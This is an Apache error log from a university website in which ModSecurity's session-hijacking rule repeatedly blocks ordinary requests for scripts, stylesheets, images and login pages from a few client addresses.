[Mon Aug 28 08:27:49.748107 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOv4FcCo-f0AAJXrItsAAAAP"]
[Mon Aug 28 08:27:49.748827 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOv4FcCo-f0AAJY@OnQAAAAB"]
[Mon Aug 28 08:27:49.750723 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOv4FcCo-f0AAJUFNeoAAAAA"]
[Mon Aug 28 08:27:49.815122 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOv4FcCo-f0AAJXyN8wAAAAM"]
[Mon Aug 28 08:27:49.866016 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOv4FcCo-f0AAJXrItwAAAAP"]
[Mon Aug 28 08:27:49.867020 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOv4FcCo-f0AAJX1kikAAAAS"]
[Mon Aug 28 08:27:49.868452 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOv4FcCo-f0AAJSr26YAAAAO"]
[Mon Aug 28 08:27:49.868917 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOv4FcCo-f0AAJXyN80AAAAM"]
[Mon Aug 28 08:27:49.869433 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOv4FcCo-f0AAJY@OnUAAAAB"]
[Mon Aug 28 08:27:49.926193 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOv4FcCo-f0AAJUFNesAAAAA"]
[Mon Aug 28 08:27:49.994769 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOv4FcCo-f0AAJX1kioAAAAS"]
[Mon Aug 28 08:27:49.994772 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOv4FcCo-f0AAJXrIt0AAAAP"]
[Mon Aug 28 08:27:49.995769 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOv4FcCo-f0AAJUFNewAAAAA"]
[Mon Aug 28 08:27:49.996369 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOv4FcCo-f0AAJY@OnYAAAAB"]
[Mon Aug 28 08:27:49.998092 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOv4FcCo-f0AAJXyN84AAAAM"]
[Mon Aug 28 08:27:50.046882 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv4FsCo-f0AAJSr26cAAAAO"]
[Mon Aug 28 08:27:50.086320 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv4FsCo-f0AAJX1kisAAAAS"]
[Mon Aug 28 08:27:50.097710 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv4FsCo-f0AAJSr26gAAAAO"]
[Mon Aug 28 08:27:50.107675 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv4FsCo-f0AAJUFNe0AAAAA"]
[Mon Aug 28 08:27:50.109157 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv4FsCo-f0AAJY@OncAAAAB"]
[Mon Aug 28 08:27:50.124504 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv4FsCo-f0AAJXrIt4AAAAP"]
[Mon Aug 28 08:27:50.140802 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv4FsCo-f0AAJXyN88AAAAM"]
[Mon Aug 28 08:27:50.169440 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv4FsCo-f0AAJX1kiwAAAAS"]
[Mon Aug 28 08:27:50.215251 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv4FsCo-f0AAJSr26kAAAAO"]
[Mon Aug 28 08:27:50.216049 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOv4FsCo-f0AAJUFNe4AAAAA"]
[Mon Aug 28 08:27:50.217657 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv4FsCo-f0AAJY@OngAAAAB"]
[Mon Aug 28 08:27:50.224680 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOv4FsCo-f0AAJXrIt8AAAAP"]
[Mon Aug 28 08:27:50.226187 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOv4FsCo-f0AAJX1ki0AAAAS"]
[Mon Aug 28 08:27:50.347752 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOv4FsCo-f0AAJXyN9AAAAAM"]
[Mon Aug 28 08:27:50.358695 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOv4FsCo-f0AAJUFNe8AAAAA"]
[Mon Aug 28 08:27:50.394733 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOv4FsCo-f0AAJXrIuAAAAAP"]
[Mon Aug 28 08:27:50.395362 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOv4FsCo-f0AAJY@OnkAAAAB"]
[Mon Aug 28 08:27:50.403409 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOv4FsCo-f0AAJSr26oAAAAO"]
[Mon Aug 28 08:27:50.403449 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOv4FsCo-f0AAJX1ki4AAAAS"]
[Mon Aug 28 08:27:50.447065 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOv4FsCo-f0AAJXyN9EAAAAM"]
[Mon Aug 28 08:27:50.463350 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOv4FsCo-f0AAJY@OnoAAAAB"]
[Mon Aug 28 08:27:50.478892 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOv4FsCo-f0AAJSr26sAAAAO"]
[Mon Aug 28 08:27:50.515955 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOv4FsCo-f0AAJXrIuEAAAAP"]
[Mon Aug 28 08:27:50.935066 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv4FsCo-f0AAJX1ki8AAAAS"]
[Mon Aug 28 08:28:42.924157 2023] [:error] [pid 38065] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv4SsCo-f0AAJSxY8MAAAAH"]
[Mon Aug 28 08:28:43.103409 2023] [:error] [pid 38059] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv4S8Co-f0AAJSr260AAAAO"]
[Mon Aug 28 08:28:44.757163 2023] [:error] [pid 37539] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/detail/3"] [unique_id "ZOv4TMCo-f0AAJKjaK4AAAAG"]
[Mon Aug 28 08:28:45.117634 2023] [:error] [pid 38338] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv4TcCo-f0AAJXCvwsAAAAJ"]
[Mon Aug 28 08:28:46.348052 2023] [:error] [pid 38462] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv4TsCo-f0AAJY@OnwAAAAB"]
[Mon Aug 28 08:28:46.500074 2023] [:error] [pid 38389] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv4TsCo-f0AAJX1kjIAAAAS"]
[Mon Aug 28 08:28:47.200120 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOv4T8Co-f0AAJSr264AAAAO"]
[Mon Aug 28 08:28:47.462242 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv4T8Co-f0AAJSr268AAAAO"]
[Mon Aug 28 08:28:49.251299 2023] [:error] [pid 38303] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/login_active2.png"] [unique_id "ZOv4UcCo-f0AAJWfZPIAAAAI"]
[Mon Aug 28 08:28:49.307799 2023] [:error] [pid 38462] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv4UcCo-f0AAJY@On0AAAAB"]
[Mon Aug 28 08:28:49.413049 2023] [:error] [pid 37539] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/login_hover2.png"] [unique_id "ZOv4UcCo-f0AAJKjaK8AAAAG"]
[Mon Aug 28 08:28:49.507654 2023] [:error] [pid 38389] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv4UcCo-f0AAJX1kjMAAAAS"]
[Mon Aug 28 08:29:03.117294 2023] [:error] [pid 38462] [client 114.122.82.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOv4X8Co-f0AAJY@On8AAAAB"]
[Mon Aug 28 08:31:53.783508 2023] [:error] [pid 38386] [client 125.164.18.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5CcCo-f0AAJXyN9gAAAAM"]
[Mon Aug 28 08:31:54.090936 2023] [:error] [pid 38389] [client 125.164.19.70] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5CsCo-f0AAJX1kjgAAAAS"]
[Mon Aug 28 08:32:00.592063 2023] [:error] [pid 38338] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv5EMCo-f0AAJXCvxEAAAAJ"]
[Mon Aug 28 08:32:00.892093 2023] [:error] [pid 38498] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5EMCo-f0AAJZiBSQAAAAA"]
[Mon Aug 28 08:32:01.015126 2023] [:error] [pid 38499] [client 125.164.17.227] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5EcCo-f0AAJZjv4IAAAAC"]
[Mon Aug 28 08:32:01.089260 2023] [:error] [pid 38498] [client 125.164.20.124] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5EcCo-f0AAJZiBSUAAAAA"]
[Mon Aug 28 08:32:10.658751 2023] [:error] [pid 38386] [client 125.164.16.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5GsCo-f0AAJXyN9oAAAAM"]
[Mon Aug 28 08:32:10.736388 2023] [:error] [pid 38498] [client 125.164.21.90] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5GsCo-f0AAJZiBSYAAAAA"]
[Mon Aug 28 08:32:15.377481 2023] [:error] [pid 38114] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5H8Co-f0AAJTinmAAAAAE"]
[Mon Aug 28 08:32:15.705688 2023] [:error] [pid 38303] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5H8Co-f0AAJWfZPcAAAAI"]
[Mon Aug 28 08:32:25.730552 2023] [:error] [pid 38499] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5KcCo-f0AAJZjv4MAAAAC"]
